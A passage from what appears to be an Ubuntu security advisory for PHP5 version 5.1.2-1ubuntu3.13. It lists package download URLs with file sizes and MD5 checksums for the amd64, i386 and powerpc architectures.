3a35d3e25eec55d65576d0f6b5fca253 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 43908 052ddb2d3e0efe6fd180ae1e250288f5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 30132 409c281c95f3bf02c564c34bbc52bdae http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 44388 25607ca3ebf3e0457c20ea4c47e35f3d http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 8346 8309bb41c1f195fc19b1bce8d730c6eb http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 15310 da4830247685e3ebb51b02bcacd9b1d0 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 29154 d1e5dcc34f2d6abfa66a2d193a10cc68 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 22706 128b3d00bf83515ae3065acb6a7e1879 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 42304 077a0218f3f0ab07f2f916b074dd6b85 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 16394 318a601dc2689cd98911937777009cf0 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 2263664 723113654e6f6150ae0743342ee3565e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 4475074 40d3b58e88b82ef15a1285a43512ddbf http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 2247554 cfeb30b87a9ae81bdb620b49c477fde6 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 136272 d28ac7c484bacf6e1602dbeb06383da8 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 22854 32e8bb20c4e53a716a7e3e4e83a6d51a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 312652 c31d62287b548577143eb4f57275e609 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 32886 0dbc2939cc6baf2c0acac4d9dee0bb6b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 19800 ed67bb5cbaf534e2edfb15e14de007a4 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 8382 2a762be1742abac5b64df0ce65e83909 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 22000 457cd07e46978526385e1d170b8ba470 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 37376 8d5084d4542e33bba9a8d0b54fbae776 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 27042 44966bd6a45a2af4d73534afbbc9c565 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 39784 57ced673510f93bd7e5172441488ef8d http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 8070 6377e700ddc7da484cd0f7ee74809e86 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 14162 b1889a9523cb80a27ac784b98e941d4d http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 25604 f2ec727d74b0587ca215a97b2fcbd662 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 20546 f8335b1346f0f19011706a2b7fc3b175 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 37818 c372b6c6f9a1dd4e8d9d75335ca27cfa http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.13_i386.deb Size/MD5: 15140 e3d5a9b0ed6dbbc86829ef5778e7a629 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 2398262 1b8526eba895ded1a6b0f35e962912d5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 4694370 ad4bfc7788d94916767ea58ecf10bea4 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 2356838 a18a229d28ead6bf651db58fe2d11855 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 136266 31ed0e8b18ac07e2c9745cbe5821434b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 26614 3e81a2685c28d76b9cb3fbec0bc49495 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 312654 beaf8441a24716ec8b9c5ab75e7c30bb http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 36610 c1b4693475b99b9c702c69edb5d32766 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 22548 d8f60015638ff78d4bad8f8704a499d8 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 10128 c5c53b698024bce46e5f1a052b57d87c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 24822 b758bc1e12c234e332e74f3b90d4565f http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 41778 6a4e55f78a44668aa278ea238fa5d142 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 30082 c3987b37c875f9982359ba61a696e55e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 43422 d1819d5264159c4db98e867cc39c6464 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 9796 c8b61e0b56113051480db8ed34fdb6eb http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 15946 d52234e6329fa8d4a75a95d50cba59ed http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.13_powerpc.deb Size/MD5: 29406 dd218657059776d7dae11e35735c1e1f http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.13_